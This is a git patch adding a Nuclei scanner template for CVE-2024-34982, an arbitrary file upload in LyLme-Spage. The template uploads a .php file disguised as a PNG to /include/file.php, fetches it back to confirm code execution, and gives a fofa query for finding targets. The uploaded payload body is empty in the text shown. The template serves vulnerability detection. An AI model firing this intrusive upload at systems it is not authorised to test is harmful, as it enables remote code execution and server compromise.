From 650cfa96d94c14507f5de6b1e238ae01919ba45e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 18 Jun 2024 12:34:32 +0530 Subject: [PATCH] Create CVE-2024-34982.yaml --- http/cves/2024/CVE-2024-34982.yaml | 71 ++++++++++++++++++++++++++++++ 1 file changed, 71 insertions(+) create mode 100644 http/cves/2024/CVE-2024-34982.yaml diff --git a/http/cves/2024/CVE-2024-34982.yaml b/http/cves/2024/CVE-2024-34982.yaml new file mode 100644 index 0000000000..7ec1c3be5d --- /dev/null +++ b/http/cves/2024/CVE-2024-34982.yaml @@ -0,0 +1,71 @@ +id: CVE-2024-34982 + +info: + name: LyLme-Spage - Arbitary File Upload + author: DhiyaneshDk + severity: high + description: | + An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file. + reference: + - https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md + - https://github.com/tanjiti/sec_profile + - https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py + metadata: + verified: true + max-request: 1 + fofa-query: icon_hash="-282504889" + tags: cve,cve2024,lylme-spage,rce,intrusive + +flow: http(1) && http(2) + +variables: + string: "{{randstr}}" + filename: "{{to_lower(rand_text_alpha(5))}}" + +http: + - raw: + - | + POST /include/file.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=---------------------------575673989461736 + + -----------------------------575673989461736 + Content-Disposition: form-data; name="file"; filename="{{filename}}.php" + Content-Type: image/png + + + -----------------------------575673989461736-- + + matchers-condition: and + matchers: + - type: word + words: + - '"code":' + - '"msg":' + - 'php"}' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + name: path + part: body + group: 1 + regex: + - '"url":"([/a-z_0-9.]+)"' + internal: true + + - raw: + - | + GET {{path}} HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body, "{{string}}" )' + - 'contains(header, "text/html")' + condition: and